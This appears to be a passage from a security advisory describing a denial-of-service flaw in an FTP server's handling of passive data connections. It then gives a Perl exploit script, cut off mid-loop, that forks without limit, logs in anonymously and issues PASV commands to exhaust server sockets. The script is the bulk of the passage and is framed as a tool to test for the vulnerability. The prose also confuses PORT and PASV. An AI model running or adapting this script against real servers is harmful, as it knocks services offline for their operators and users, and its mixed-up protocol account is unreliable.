If a remote host establishes a data connection to the FTP server and the user then issues a subsequent PORT command, the server must close the data connection before listening on the new port and sending the positive reply to the subsequent PASV command. This leaves the old data connection in a CLOSE WAIT state, at best, or FIN WAIT 2 state if the attacker simply abandons the data connection instead of properly closing it. This allows the attacker to perform a Denial-of-Service (DoS) attack by opening a large number of sockets.
The following exploit script can be used to test for this vulnerability:
#!/usr/bin/perl
$DOS_HOST="localhost";
use IO::Socket;
$pid = $$;
$num = 0;
while (1) {
while (fork) {
$sock = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $DOS_HOST,
PeerPort => "ftp(21)",
);
if (!$sock) {
print "connect failed!\n";
waitpid -1,0;
}
while (<$sock>) {
print;
print $sock "USER anonymous\r\n" if (/^220 .*/);
print $sock "PASS root@\r\n" if (/^331 .*/);
print $sock "PASV\r\n" if (/^230 .*/);
